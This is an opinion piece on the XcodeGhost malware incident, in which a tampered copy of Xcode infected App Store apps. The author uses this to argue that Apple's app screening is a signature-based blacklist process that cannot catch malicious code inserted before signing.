Certainly a good number of apps (4,000 or so, by some counts) on Apple’s App Store were infected with what has come to be known as the XcodeGhost malware. Plenty has already been written about this, but the TL;DR version is this: A version of Xcode was compromised and distributed online to legitimate Chinese app developers. They unknowingly introduced the malware into the Apple App Store via their apps. The malware, once run on a consumer’s iOS device, communicated with the attackers and was capable of, among other things, robbing a user of private information, including login credentials.
That’s pretty nasty stuff, without a doubt, but let’s take a step back and see what can be learned from the incident. Two things come immediately to mind.
My security mantra is “There ain’t a horse that can’t be rode, nor a man that can’t be throwed.”Apple isn’t perfect. None of us is. That’s why responsible companies have robust incident response programs in place, to clean up the mess after mistakes are made. But that’s not the point I want to make today.
My hope is that Apple will address architectural weaknesses in the way it vets apps. What comes to my mind is that the digital signatures that Apple relies on for iOS’s security are in essence tamper-evident seals. Now, let’s say that someone wanted to put some bad stuff inside a bottle of aspirin that is protected with a tamper-evident seal. Messing with the packaging is going to make it clear that it has been tampered with. (That’s what makes the packing tamper-evident, right) What will work better is to do the dirty work upstream in the production process, before the tamper-evident seal is applied. That’s what the attackers did; they tampered with the code before the digital signature was applied.
To succeed, the attackers had to make their modified version of Xcode attractive to developers. That could have been something like better language support, but I don’t really know. What is clear is that enough of them felt that the modified version of Xcode was better than Apple’s in some way, even though Apple’s Xcode is free via its Mac App Store.
Apple may need to find a way to force developers to use its version of Xcode. That won’t be easy, but it’s also not the real problem.
For me, this is the pertinent question: Why on earth didn’t Apple’s screening process detect and stop the XcodeGhost malware in the first place The answer is fairly obvious, and it’s a problem that has plagued the antivirus industry from its inception.
Apple’s screening process, which doesn’t do any form of source code review, is very good at some things, and not so good at others. It makes sure an app runs as described. It makes sure an app plays by Apple’s rules (for example, that it only uses published APIs). It also looks for things like memory leaks that cause an app to allocate memory without freeing it up again.
But it’s not real good at screening for deliberate, malicious “features”of apps. Apple could, and I expect does, look for signatures of known bad things that could be in an app. But it doesn’t screen the app’s security.
In practice, this means that if your app opens and writes to a file, Apple will ensure that you’re using a published API to do that. It will make sure that your app behaves as expected with regards to that file. But if you choose to put client information into that file without encrypting it, that’s really not Apple’s concern — nor should it be, if you ask me. That is business-level security and must be applied by the developer.
So from Apple’s perspective, the XcodeGhost malware was simply a deliberate feature of the infected apps. They’d been signed by their developers, so they contained that tamper-evident seal. The apps behaved as documented.
Should Apple have looked for undocumented behavior Perhaps. In hindsight, it would have been nice if Apple had observed the apps while they ran and looked for unauthorized, outbound HTTP connections. But how could Apple rightly know which network connections were unauthorized If the malware was using the Apple API for HTTP connectivity, then it was authorized, right
We can all second-guess what Apple did and didn’t do that allowed so many malware-infected apps to enter the App Store. The important thing, though, is that Apple do some second-guessing of its own. I’ll bet it is going to be taking a critical review of its app screening process and making some improvements. And so it should. But before we criticize, let’s remember that pithy saying about the horse. App screening is fundamentally a blacklist process, and you’re doomed to be “throwed”from time to time.